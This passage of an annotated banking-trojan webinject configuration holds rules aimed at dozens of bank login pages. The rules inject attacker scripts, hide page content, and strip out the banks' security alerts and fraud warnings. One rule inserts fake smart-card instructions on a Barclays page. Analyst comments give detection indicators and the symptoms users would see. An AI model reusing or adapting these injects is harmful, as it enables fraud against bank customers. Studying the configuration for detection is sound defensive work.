             matches any https URL that contains that string anywhere, not only URLs on that host. The extra botnet
             condition (type allow, id 1) presumably limits the rule to bots of that botnet id. The modify action
             appends body-hiding CSS, jQuery 1.4.2 from ajax.googleapis.com, a jQuery.noConflict() alias named jq and
             the relative script webstsomni.js?system=172 after the opening head tag. Requests for webstsomni.js
             under this host are the indicator to search for. -->
  1643. <conditions>
  1644. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://.*personal\.co-operativebank\.co\.uk.*]]></url>
  1645. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1646. </url>
  1647. <botnet type="allow" id="1" />
  1648. </conditions>
  1649. <actions>
  1650. <modify>
  1651. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1652. <replacement><![CDATA[\1<style type="text/css">
  1653. body {visibility: hidden; }
  1654. </style>
  1655. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1656. <script type="text/javascript">var jq = jQuery.noConflict();</script>
  1657. <script type="text/javascript" src="webstsomni.js?system=172"></script>]]></replacement>
  1658. </modify>
  1659. </actions>
  1660. </httpinject>
  1661. <httpinject>
        <!-- Analyst note: scoped to login.myproducts.tescobank.com/arcotafm/saml/controllerCustomTB.jsp, with a
             botnet condition (type allow, id 1) that presumably limits it to bots of that id. Unlike the sibling
             rules, the pattern matches the opening body tag, so the body-hiding CSS, jQuery 1.4.2 include,
             jQuery.noConflict() alias and the relative script webstsomni.js?system=171 land inside the body.
             Requests for webstsomni.js under this path are the indicator to search for. -->
  1662. <conditions>
  1663. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://login\.myproducts\.tescobank\.com/arcotafm/saml/controllerCustomTB\.jsp.*]]></url>
  1664. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  1665. </url>
  1666. <botnet type="allow" id="1" />
  1667. </conditions>
  1668. <actions>
  1669. <modify>
  1670. <pattern modifiers="msU"><![CDATA[(\<body.*\>)]]></pattern>
  1671. <replacement><![CDATA[\1<style type="text/css">
  1672. body {visibility: hidden; }
  1673. </style>
  1674. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  1675. <script type="text/javascript">var jq = jQuery.noConflict();</script>
  1676. <script type="text/javascript" src="webstsomni.js?system=171"></script>]]></replacement>
  1677. </modify>
  1678. </actions>
  1679. </httpinject>
  1680. <httpinject>
        <!-- Analyst note: scoped to corporate.adcb.com/corporateWeb/ (case-insensitive per the i flag). The modify
             action keeps the closing form tag and adds a script tag for the relative path scripts/webcticker.js
             right after it. The src is relative, so it resolves against the page URL and no third-party host appears
             in the markup; presumably the bot supplies the file. Requests for scripts/webcticker.js under this host
             are the indicator to search for in proxy logs. -->
  1681. <conditions>
  1682. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://corporate\.adcb\.com/corporateWeb/</url>
  1683. </conditions>
  1684. <actions>
  1685. <modify>
  1686. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1687. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1688. </modify>
  1689. </actions>
  1690. </httpinject>
  1691. <httpinject>
        <!-- Analyst note: scoped to ibb.aibgb1.co.uk/ibb/controller. Adds a script tag for the relative path
             scripts/webcticker.js right after the closing form tag. This rule has no deny condition for static
             files, unlike the /logs/dtukvbv/js.php rules in the same config. -->
  1692. <conditions>
  1693. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibb\.aibgb1\.co\.uk/ibb/controller</url>
  1694. </conditions>
  1695. <actions>
  1696. <modify>
  1697. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1698. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1699. </modify>
  1700. </actions>
  1701. </httpinject>
  1702. <httpinject>
        <!-- Analyst note: scoped to ibusinessbanking.aib.ie/ibb/controller, the same URL that the business.aib.ie
             rule in this config opens in a popup. Adds a script tag for the relative path scripts/webcticker.js
             right after the closing form tag. -->
  1703. <conditions>
  1704. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibusinessbanking\.aib\.ie/ibb/controller</url>
  1705. </conditions>
  1706. <actions>
  1707. <modify>
  1708. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1709. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1710. </modify>
  1711. </actions>
  1712. </httpinject>
  1713. <httpinject>
        <!-- Analyst note: scoped to http://business.aib.ie/login and /businesslogin. The scheme is plain http and the
             dots in the host are unescaped, so the regex is looser than the literal host name. No script is loaded;
             the three modify actions only rewrite markup: (1) add display:none to the element carrying
             alt="Secuirty Alert" (spelling as in the pattern, presumably copied from the page); (2) hide a content
             column div; (3) hide the ibbLauncher section and put in its place a LOG IN TO IBB button that opens
             https://ibusinessbanking.aib.ie/ibb/controller?reqID=login in a popup, a URL that another rule in this
             config matches. For responders: on an affected machine the bank's security alert is missing from this
             entry page. -->
  1714. <conditions>
  1715. <url type="allow" onpost="1" onget="1" modifiers="iU">^http://business.aib.ie/(business|)login</url>
  1716. </conditions>
  1717. <actions>
  1718. <modify>
  1719. <pattern modifiers="i"><![CDATA[(alt="Secuirty Alert")]]></pattern>
  1720. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
  1721. </modify>
  1722. <modify>
  1723. <pattern modifiers="i"><![CDATA[(<div class="content parsys"><div class="parsys_column colctrl\-4c")]]></pattern>
  1724. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
  1725. </modify>
  1726. <modify>
  1727. <pattern modifiers="i"><![CDATA[<div class="parbase ibbLauncher section">]]></pattern>
  1728. <replacement><![CDATA[<div><img src="/etc/designs/default/0.gif" class="cq-dd-image cq-image-placeholder" alt="" title="" id="cq-gen321"><div class="clear"></div><div class="product"><div class="action no-padding"><div class="button"><a data-text="Business Log In" href="javascript:void(window.open('https://ibusinessbanking.aib.ie/ibb/controller?reqID=login', 'example1', 'top=1, left=1, width=790, height=522, location=no, menubar=no, status=yes, toolbar=no, scrollbars=no, resizable=no'))" rel="nofollow">LOG IN TO IBB</a> </div></div></div></div><div class="parbase ibbLauncher section" style="display:none;">]]></replacement>
  1729. </modify>
  1730. </actions>
  1731. </httpinject>
  1732. <httpinject>
        <!-- Analyst note: scoped to online.adambank.com/eBankingAdamLogin/login. Here the script tag for the relative
             path scripts/webcticker.js is placed before the closing body tag (the \1 follows the script in the
             replacement), not after a form tag as in most sibling rules. -->
  1733. <conditions>
  1734. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.adambank\.com/eBankingAdamLogin/login</url>
  1735. </conditions>
  1736. <actions>
  1737. <modify>
  1738. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
  1739. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
  1740. </modify>
  1741. </actions>
  1742. </httpinject>
  1743. <httpinject>
        <!-- Analyst note: scoped to www.mybusinessbank.co.uk/cs70_banking/logon/slogon. Adds a script tag for the
             relative path scripts/webcticker.js right after the closing form tag. The relative src would resolve
             under the logon path of this host, which is where to look for the request in proxy logs. -->
  1744. <conditions>
  1745. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.mybusinessbank\.co\.uk/cs70\_banking/logon/slogon</url>
  1746. </conditions>
  1747. <actions>
  1748. <modify>
  1749. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1750. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1751. </modify>
  1752. </actions>
  1753. </httpinject>
  1754. <httpinject>
        <!-- Analyst note: scoped to leumionline.bankleumi.co.uk/my.policy. Adds a script tag for the relative path
             scripts/webcticker.js right after the closing form tag. The pattern is not anchored at the end, so any
             URL that begins with this prefix matches. -->
  1755. <conditions>
  1756. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://leumionline\.bankleumi\.co\.uk/my\.policy</url>
  1757. </conditions>
  1758. <actions>
  1759. <modify>
  1760. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1761. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1762. </modify>
  1763. </actions>
  1764. </httpinject>
  1765. <httpinject>
        <!-- Analyst note: scoped to online.bankofcyprus.co.uk/netteller/login.faces. Two modify actions: the first
             adds a script tag for the relative path scripts/webcticker.js after the closing form tag; the second
             prefixes display:none; to the inline style of the element with id form:gridPanel61, hiding it. What that
             panel shows on the real page cannot be told from this config. -->
  1766. <conditions>
  1767. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.bankofcyprus\.co\.uk/netteller/login\.faces</url>
  1768. </conditions>
  1769. <actions>
  1770. <modify>
  1771. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1772. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1773. </modify>
  1774. <modify>
  1775. <pattern modifiers="i"><![CDATA[(id="form:gridPanel61" style=")]]></pattern>
  1776. <replacement><![CDATA[\1display:none;]]></replacement>
  1777. </modify>
  1778. </actions>
  1779. </httpinject>
  1780. <httpinject>
        <!-- Analyst note: two allow URLs, www.boi-bol.com/newHome.jsp and /comLogon.jsp. Four modify actions: (1) add
             a script tag for the relative path scripts/webcticker.js after the closing form tag; (2) add
             visibility:hidden to the element titled "Contact Us"; (3) hide the div with class securityInfo;
             (4) set min-height:auto on the element with id javaAppletDiv. For responders: on an affected machine the
             contact link and the security information block are missing from these pages. -->
  1781. <conditions>
  1782. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.boi\-bol\.com/newHome\.jsp</url>
  1783. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.boi\-bol\.com/comLogon\.jsp</url>
  1784. </conditions>
  1785. <actions>
  1786. <modify>
  1787. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1788. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1789. </modify>
  1790. <modify>
  1791. <pattern modifiers="i"><![CDATA[font\-weight: bold;" title="Contact Us"]]></pattern>
  1792. <replacement><![CDATA[visibility:hidden;font-weight: bold;" title="Contact Us"]]></replacement>
  1793. </modify>
  1794. <modify>
  1795. <pattern modifiers="i"><![CDATA[(div class="securityInfo")]]></pattern>
  1796. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
  1797. </modify>
  1798. <modify>
  1799. <pattern modifiers="i"><![CDATA[(id="javaAppletDiv")]]></pattern>
  1800. <replacement><![CDATA[\1 style="min-height:auto;"]]></replacement>
  1801. </modify>
  1802. </actions>
  1803. </httpinject>
  1804. <httpinject>
        <!-- Analyst note: scoped to banking.bankofscotland.co.uk/Logon/Logon.aspx, followed by a query string or the
             end of the URL. Two modify actions: the first adds a script tag for the relative path
             scripts/webcticker.js after the closing form tag; the second replaces a span of class message whose text
             starts with Reminder by an empty span, removing whatever reminder the bank shows there. The second
             pattern has only the i flag, so .* presumably stays within one line (TODO confirm engine semantics). -->
  1805. <conditions>
  1806. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://banking\.bankofscotland\.co\.uk/Logon/Logon\.aspx(\?|$)
  1807. </url>
  1808. </conditions>
  1809. <actions>
  1810. <modify>
  1811. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1812. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1813. </modify>
  1814. <modify>
  1815. <pattern modifiers="i"><![CDATA[ class="message">Reminder.*</span>]]></pattern>
  1816. <replacement><![CDATA[></span>]]></replacement>
  1817. </modify>
  1818. </actions>
  1819. </httpinject>
  1820. <httpinject>
        <!-- Analyst note: scoped to online-business.bankofscotland.co.uk/business/logon/login.jsp, followed by a
             query string or the end of the URL. Adds a script tag for the relative path scripts/webcticker.js right
             after the closing form tag. The url element text ends with a line break before its closing tag; whether
             the bot trims it before compiling the regex is not visible here. -->
  1821. <conditions>
  1822. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\-business\.bankofscotland\.co\.uk/business/logon/login\.jsp(\?|$)
  1823. </url>
  1824. </conditions>
  1825. <actions>
  1826. <modify>
  1827. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1828. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1829. </modify>
  1830. </actions>
  1831. </httpinject>
  1832. <httpinject>
        <!-- Analyst note: scoped to cashmanagement.barclays.net/portalservices/forms/login.pser. First modify: after
             the opening head tag it hides the body, loads the relative script scripts/webcticker.js, and sets a
             5000 ms timer that makes the body visible again. Second modify: replaces the text that follows
             "Your security obligations" (up to the next div) with wording that tells the user to keep the smart card
             inserted in the card reader and to tick an acknowledgement box. That replaced wording is a user-visible
             tell worth passing to fraud and help-desk teams; the page delay is a second symptom. -->
  1833. <conditions>
  1834. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://cashmanagement\.barclays\.net/portalservices/forms/login\.pser
  1835. </url>
  1836. </conditions>
  1837. <actions>
  1838. <modify>
  1839. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  1840. <replacement><![CDATA[\1
  1841. <style type="text/css">
  1842. body {visibility: hidden; }
  1843. </style>
  1844. <script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>
  1845. <script type="text/javascript">setTimeout(function(){document.body.style.visibility = 'visible';}, 5000);</script>
  1846. ]]></replacement>
  1847. </modify>
  1848. <modify>
  1849. <pattern modifiers="msU"><![CDATA[Your security obligations.*<div]]></pattern>
  1850. <replacement><![CDATA[Your security obligations
  1851. </div>
  1852. Due to our recent security changes you should <b>keep your smart card inserted in your card reader</b>.
  1853. <p class="SecurityMsgBorder_Bottom">This security message will appear periodically.</p>Please tick the box to acknowledge these security obligations.
  1854. </div>
  1855. <div]]></replacement>
  1856. </modify>
  1857. </actions>
  1858. </httpinject>
  1859. <httpinject>
        <!-- Analyst note: scoped to www.barclayswealth.com/login/action/logon/unauthenticated/personal/loginDetails.
             Two modify actions: the first adds a script tag for the relative path scripts/webcticker.js after the
             closing form tag; the second adds display:none to the element whose attribute value ends in
             ContentAdditionalLinks, hiding that block of links from the user. -->
  1860. <conditions>
  1861. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.barclayswealth\.com/login/action/logon/unauthenticated/personal/loginDetails</url>
  1862. </conditions>
  1863. <actions>
  1864. <modify>
  1865. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1866. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1867. </modify>
  1868. <modify>
  1869. <pattern modifiers="i"><![CDATA[(ContentAdditionalLinks")]]></pattern>
  1870. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
  1871. </modify>
  1872. </actions>
  1873. </httpinject>
  1874. <httpinject>
        <!-- Analyst note: scoped to any URL on connect.barclays.com whose path or query contains the string authen
             (the pattern is /.*authen with no further anchor). Adds a script tag for the relative path
             scripts/webcticker.js right after the closing form tag. -->
  1875. <conditions>
  1876. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://connect\.barclays\.com/.*authen</url>
  1877. </conditions>
  1878. <actions>
  1879. <modify>
  1880. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1881. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1882. </modify>
  1883. </actions>
  1884. </httpinject>
  1885. <httpinject>
        <!-- Analyst note: scoped to www.fundsdirect.co.uk/bks/login.aspx with the query bksid=beaumont, so only that
             one bksid value is covered by this rule. The script tag for the relative path scripts/webcticker.js is
             placed before the closing body tag (the \1 follows the script in the replacement). -->
  1886. <conditions>
  1887. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.fundsdirect\.co\.uk/bks/login\.aspx\?bksid=beaumont</url>
  1888. </conditions>
  1889. <actions>
  1890. <modify>
  1891. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
  1892. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
  1893. </modify>
  1894. </actions>
  1895. </httpinject>
  1896. <httpinject>
        <!-- Analyst note: scoped by prefix to https://corporate.cbq.com.qa. The pattern has no slash or anchor after
             .qa, so it covers every path on that host and, strictly read, any longer host name that begins with the
             same string. Adds a script tag for the relative path scripts/webcticker.js right after the closing form
             tag. -->
  1897. <conditions>
  1898. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://corporate\.cbq\.com\.qa</url>
  1899. </conditions>
  1900. <actions>
  1901. <modify>
  1902. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1903. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1904. </modify>
  1905. </actions>
  1906. </httpinject>
  1907. <httpinject>
        <!-- Analyst note: scoped to the LoginEntryServletBKS servlet URL on securebank.cahoot.com. Adds a script tag
             for the relative path scripts/webcticker.js right after the closing form tag. Requests for
             scripts/webcticker.js under the /servlet/ path of this host are the indicator to search for. -->
  1908. <conditions>
  1909. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://securebank\.cahoot\.com/servlet/com\.aquariussecurity\.bks\.security\.authentication\.servlet\.LoginEntryServletBKS</url>
  1910. </conditions>
  1911. <actions>
  1912. <modify>
  1913. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1914. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1915. </modify>
  1916. </actions>
  1917. </httpinject>
  1918. <httpinject>
        <!-- Analyst note: targets the Cater Allen WebAccess.dll URL. A script element (relative src scripts/webcticker.js) is inserted just before the closing body tag. The script is not included in this listing. -->
  1919. <conditions>
  1920. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.caterallenonline\.co\.uk/WebAccess\.dll</url>
  1921. </conditions>
  1922. <actions>
  1923. <modify>
  1924. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
  1925. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
  1926. </modify>
  1927. </actions>
  1928. </httpinject>
  1929. <httpinject>
        <!-- Analyst note: the host part allows an optional numeric suffix (home, home1, home2 ...) and the path must contain /lmgru followed later by /ceblm-web/. The action appends a script element (relative src scripts/webcticker.js) after the closing form tag; the script is not part of this listing. -->
  1930. <conditions>
  1931. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://home\d*\.cybusinessonline\.co\.uk/lmgru.*/ceblm\-web/</url>
  1932. </conditions>
  1933. <actions>
  1934. <modify>
  1935. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1936. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1937. </modify>
  1938. </actions>
  1939. </httpinject>
  1940. <httpinject>
        <!-- Analyst note: no script is injected here. On the essential-maintenance/fraud-message path (http or https), the inline style text "position: relative; padding-bottom: 20px;" gets "visibility:hidden;" appended, which makes whatever element carries that style invisible. Judging by the URL path this is presumably the bank's own fraud notice; the page markup is not shown, so that is an inference. -->
  1941. <conditions>
  1942. <url type="allow" onpost="1" onget="1" modifiers="iU">^https?://www\.cybusinessonline\.co\.uk/essential\-maintenance/fraud\-message</url>
  1943. </conditions>
  1944. <actions>
  1945. <modify>
  1946. <pattern modifiers="i"><![CDATA[(position: relative; padding-bottom: 20px;)]]></pattern>
  1947. <replacement><![CDATA[\1visibility:hidden;]]></replacement>
  1948. </modify>
  1949. </actions>
  1950. </httpinject>
  1951. <httpinject>
        <!-- Analyst note: targets the /corp/BANKAWAY path on the business.co-operativebank.co.uk host. The pattern (</form>) is replaced by itself plus a script element with relative src scripts/webcticker.js. The script is not included in this listing. -->
  1952. <conditions>
  1953. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://business\.co\-operativebank\.co\.uk/corp/BANKAWAY</url>
  1954. </conditions>
  1955. <actions>
  1956. <modify>
  1957. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1958. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1959. </modify>
  1960. </actions>
  1961. </httpinject>
  1962. <httpinject>
        <!-- Analyst note: same path (/corp/BANKAWAY) as used on another co-operativebank host, here on fdonline. A script element (relative src scripts/webcticker.js) is appended after the closing form tag. The script is not included in this listing. -->
  1963. <conditions>
  1964. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://fdonline\.co\-operativebank\.co\.uk/corp/BANKAWAY</url>
  1965. </conditions>
  1966. <actions>
  1967. <modify>
  1968. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  1969. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1970. </modify>
  1971. </actions>
  1972. </httpinject>
  1973. <httpinject>
        <!-- Analyst note: everything under /cbfm/ on this cashfac host is in scope. The action appends a script element (relative src scripts/webcticker.js) after the closing form tag. The pattern carries modifiers "is" where most sibling rules use "i"; for a literal pattern with no dot that difference should not matter if these are PCRE-style flags (assumption). -->
  1974. <conditions>
  1975. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://cbfm\.saas\.cashfac\.com/cbfm/</url>
  1976. </conditions>
  1977. <actions>
  1978. <modify>
  1979. <pattern modifiers="is"><![CDATA[(</form>)]]></pattern>
  1980. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  1981. </modify>
  1982. </actions>
  1983. </httpinject>
  1984. <httpinject>
        <!-- Analyst note: two plain-http noticeboard URLs are listed as conditions. The single action deletes (empty replacement) an article element of class textareaDefault whose content includes the phrase "be fooled by fraudsters". As written, the rule removes that notice from the page the visitor sees; no script is injected by this rule. -->
  1985. <conditions>
  1986. <url type="allow" onpost="1" onget="1" modifiers="iU">^http://www\.co\-operativebank\.co\.uk/corporate/fdo\-noticeboard</url>
  1987. <url type="allow" onpost="1" onget="1" modifiers="iU">^http://www\.co\-operativebank\.co\.uk/business/businessonlinebanking/bobs\-noticeboard</url>
  1988. </conditions>
  1989. <actions>
  1990. <modify>
  1991. <pattern modifiers="isU"><![CDATA[<article class="textareaDefault">.*be fooled by fraudsters.*</article>]]></pattern>
  1992. <replacement><![CDATA[]]></replacement>
  1993. </modify>
  1994. </actions>
  1995. </httpinject>
  1996. <httpinject>
        <!-- Analyst note: targets the companyLogin.jsp page on cbionline.cbi.ae. The pattern (</form>) is replaced by itself plus a script element with relative src scripts/webcticker.js. The script is not included in this listing. -->
  1997. <conditions>
  1998. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://cbionline\.cbi\.ae/bus/security/companyLogin\.jsp</url>
  1999. </conditions>
  2000. <actions>
  2001. <modify>
  2002. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2003. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2004. </modify>
  2005. </actions>
  2006. </httpinject>
  2007. <httpinject>
        <!-- Analyst note: the URL must end at login.jsp or continue with a query string. All modifiers attributes in this rule are empty, so matching is presumably case-sensitive (assumes PCRE-style flags). Two edits are made: a script element (relative src scripts/webcticker.js) after the closing form tag, and a style rule after the head tag. -->
  2008. <conditions>
  2009. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.cbdibusiness\.ae/cb/servlet/cb/login\.jsp($|\?)</url>
  2010. </conditions>
  2011. <actions>
  2012. <modify>
  2013. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
  2014. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2015. </modify>
        <!-- Adds a CSS rule that hides every element with class sectionhead; what the page puts in those elements is not visible in this listing. -->
  2016. <modify>
  2017. <pattern modifiers=""><![CDATA[(<head>)]]></pattern>
  2018. <replacement><![CDATA[\1<style>.sectionhead {display:none;}</style>]]></replacement>
  2019. </modify>
  2020. </actions>
  2021. </httpinject>
  2022. <httpinject>
        <!-- Analyst note: targets the Coutts e-banking login path. A script element (relative src scripts/webcticker.js) is inserted just before the closing body tag. The script is not included in this listing. -->
  2023. <conditions>
  2024. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.coutts\.com/eBankingCouttsLogin/login</url>
  2025. </conditions>
  2026. <actions>
  2027. <modify>
  2028. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
  2029. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
  2030. </modify>
  2031. </actions>
  2032. </httpinject>
  2033. <httpinject>
        <!-- Analyst note: covers the Danske Bank business logon page on both the co.uk and com domains, with an optional numeric host suffix. Three edits are listed: a script element (relative src scripts/webcticker.js) before the closing body tag, and two attempts to hide named div elements. -->
  2034. <conditions>
  2035. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://business\d*\.danskebank\.(co\.uk|com)/pub/logon/logon\.aspx</url>
  2036. </conditions>
  2037. <actions>
  2038. <modify>
  2039. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
  2040. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
  2041. </modify>
        <!-- Adds display:none to the div with id ctl00_AsideArea_DbgBox1; the content of that box is not visible in this listing. -->
  2042. <modify>
  2043. <pattern modifiers="isU"><![CDATA[(<div id="ctl00_AsideArea_DbgBox1")]]></pattern>
  2044. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
  2045. </modify>
        <!-- NOTE(review): this pattern starts with "<di22222v", which is not how a div tag is spelled, so as written it would not match an ordinary div. Whether that is a typo or a deliberate way of switching the rule off cannot be told from the listing. -->
  2046. <modify>
  2047. <pattern modifiers="isU"><![CDATA[(<di22222v id="ctl00_HeadArea_WPManager_DbgCmsContent3")]]></pattern>
  2048. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
  2049. </modify>
  2050. </actions>
  2051. </httpinject>
  2052. <httpinject>
        <!-- Analyst note: targets the corporate login page on online.dib.ae. The pattern (</form>) is replaced by itself plus a script element with relative src scripts/webcticker.js. The script is not included in this listing. -->
  2053. <conditions>
  2054. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://online\.dib\.ae/webapplication\.ui/localoperations/login/corporateloginpage\.aspx</url>
  2055. </conditions>
  2056. <actions>
  2057. <modify>
  2058. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2059. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2060. </modify>
  2061. </actions>
  2062. </httpinject>
  2063. <httpinject>
        <!-- Analyst note: every path on login.smartbusiness.ae is in scope. The action appends a script element (relative src scripts/webcticker.js) after the closing form tag; the script is not part of this listing. -->
  2064. <conditions>
  2065. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://login\.smartbusiness\.ae/</url>
  2066. </conditions>
  2067. <actions>
  2068. <modify>
  2069. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2070. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2071. </modify>
  2072. </actions>
  2073. </httpinject>
  2074. <httpinject>
        <!-- Analyst note: matches CorpLogin.htm or CorpLogin.html, either at the end of the URL or followed by a query string. The action appends a script element (relative src scripts/webcticker.js) after the closing form tag; the script is not part of this listing. -->
  2075. <conditions>
  2076. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.fgb\.ae/fgbcorporate/CorpLogin\.html?(\?|$)</url>
  2077. </conditions>
  2078. <actions>
  2079. <modify>
  2080. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2081. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2082. </modify>
  2083. </actions>
  2084. </httpinject>
  2085. <httpinject>
        <!-- Analyst note: the host requires at least one digit after www (www1, www2 ...) and the path must start with /1/2/. The action appends a script element (relative src scripts/webcticker.js) after the closing form tag; the script is not part of this listing. -->
  2086. <conditions>
  2087. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\d+\.firstdirect\.com/1/2/</url>
  2088. </conditions>
  2089. <actions>
  2090. <modify>
  2091. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2092. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2093. </modify>
  2094. </actions>
  2095. </httpinject>
  2096. <httpinject>
        <!-- Analyst note: targets the Halifax personal login.jsp URL and inserts a script element (relative src scripts/webcticker.js) before the closing body tag. In this listing the url text is followed by a line break before its closing tag; whether that newline is in the original configuration or an artefact of the paste cannot be told from here. -->
  2097. <conditions>
  2098. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.halifax\-online\.co\.uk/personal/logon/login\.jsp
  2099. </url>
  2100. </conditions>
  2101. <actions>
  2102. <modify>
  2103. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
  2104. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
  2105. </modify>
  2106. </actions>
  2107. </httpinject>
  2108. <httpinject>
